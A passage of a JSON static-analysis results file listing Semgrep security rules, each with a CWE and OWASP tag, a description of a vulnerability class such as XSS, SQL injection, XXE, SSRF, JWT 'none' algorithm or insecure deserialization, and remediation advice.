256bit."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","id":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","name":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"help":{"markdown":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw)\n - [https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===](https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===)\n - [https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027](https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027)\n","text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","id":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","name":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell","id":"ruby.lang.security.dangerous-subshell.dangerous-subshell","name":"ruby.lang.security.dangerous-subshell.dangerous-subshell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-subshell.dangerous-subshell"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"help":{"markdown":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","id":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","name":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint","id":"rust.hyper.sql.postgres-taint.postgres-taint","name":"rust.hyper.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","id":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","name":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"help":{"markdown":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection)\n - [https://laravel.com/docs/8.x/queries](https://laravel.com/docs/8.x/queries)\n","text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection","id":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","name":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-sql-injection.laravel-sql-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"help":{"markdown":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md)\n","text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","id":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","name":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-direct-response-write.laravel-direct-response-write"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","id":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","name":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"help":{"markdown":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone)\n - [https://pkg.go.dev/github.com/gorilla/sessions#Options](https://pkg.go.dev/github.com/gorilla/sessions#Options)\n","text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"helpUri":"https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","id":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","name":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"help":{"markdown":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses)\n","text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","id":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","name":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.xss.xss)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/javascript.browser.xss.xss","id":"javascript.browser.xss.xss","name":"javascript.browser.xss.xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.xss.xss"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"help":{"markdown":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization)\n - [https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/](https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)\n","text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"helpUri":"https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","id":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","name":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg","id":"javascript.jose.security.jwt-none-alg.jwt-none-alg","name":"javascript.jose.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","id":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","name":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg","id":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","name":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.jjwt.security.jwt-none-alg.jjwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","id":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","name":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by 